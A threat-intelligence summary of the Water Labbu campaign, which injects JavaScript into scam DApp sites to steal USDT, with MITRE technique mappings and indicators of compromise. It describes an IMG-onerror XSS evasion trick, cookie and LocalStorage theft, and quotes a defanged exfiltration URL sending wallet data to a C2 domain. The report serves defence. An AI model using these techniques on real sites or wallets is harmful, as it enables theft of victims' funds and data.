Water Labbu is a threat actor that parasitically hijacks scam DApp websites by injecting malicious JavaScript to steal cryptocurrency. The campaign uses injected payloads and delivery servers to obtain wallet permissions and drain USDT balances, disguising activity as legitimate DApps. #WaterLabbu #tmpmeta #linkstometa #USDT #Ethereum
Keypoints
- Water Labbu parasitically hijacks scam DApp websites by injecting malicious JavaScript to steal cryptocurrency, instead of using direct social engineering.
- The attacker uses an XSS evasion technique (an IMG tag with onerror) to load a Base64-encoded JavaScript payload from a delivery server and tailor content by IP and User-Agent.
- The injected payload requests permissions (token allowances) to transfer assets from victims’ wallets, often disguising the request as coming from the compromised DApp.
- Cookies and LocalStorage data are collected and exfiltrated, with wallet balance and address information sent to an external server before any further action.
- The operation targets fraudulent DApps (about 45 compromised sites) and has drained at least 316,728 USDT from nine victims as of Aug 2022.
- Delivery infrastructure involves multiple servers (tmpmeta.com, whg7.cc, r8s.cc) and deceptive overlays (fake Flash update) to persuade victims to download malicious files like flashupdate_v_3.10.exe.
MITRE Techniques
- [T1189] Drive-by Compromise – Compromise scam DApp websites and inject malicious JavaScript. Quote: “parasitic Water Labbu… compromising the websites of other scammers posing as a decentralized application (DApp) and injected malicious JavaScript code into them.”
- [T1059.007] JavaScript – XSS-based delivery of a Base64-encoded payload loaded via an onerror event. Quote: “an IMG tag to load a Base64- encoded JavaScript payload using the ‘onerror’ event, in what is known as an XSS evasion technique, to bypass Cross Site Scripting (XSS) filters.”
- [T1105] Ingress Tool Transfer – Delivery servers load and serve different payloads from external servers (tmpmeta[.]com) based on environment. Quote: “The delivery server then filters victims and delivers different content based on the IP address and the browser User-Agent header.”
- [T1555.003] Credentials in Web Browsers – Stealer script collects cookies and LocalStorage data from victims. Quote: “stealer script that will collect cookie and LocalStorage data and send them back to the delivery server.”
- [T1071.001] Web Protocols – Exfiltration of wallet data via HTTP to a C2 server (linkstometa[.]com). Quote: “hxxps[:]//linkstometa[.]com/data/?get&s=[%22{ETH balance}%22,%22{USDT balance}%22]&j={Ethereum address}”
- [T1204.002] User Execution – Fake Flash overlay leading to download of a malicious executable (flashupdate_v_3.10.exe). Quote: “fake Flash installation message… downloading the latest version” and the downloaded file is “flashupdate_v_3.10.exe.”
Indicators of Compromise
- [Domain] Delivery/C2 domains – tmpmeta.com, linkstometa.com, whg7.cc, r8s.cc
- [Ethereum Address] Victim funds and token flows – 0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a, 0x3e9f1d6e244d773360dce4ca88ab3c054f502d51
- [Ethereum Address] Additional drains – 0x486d08f635b90196e5793725176d9f7ead155fed, 0xfc74d6cfdf6da90ae996c999e12002090bc6d5bf
- [Ethereum Address] Newer drain address – 0xfece995f99549011a88bbb8980bbedd8fada5a35
- [Asset] USDT – at least 316,728 USDT drained from nine victims
- [File] flashupdate_v_3.10.exe – downloaded via fake Flash overlay from compromised sites
- [GitHub Repository] flashtech9/Flash – hosting the installer linked to the fake Flash download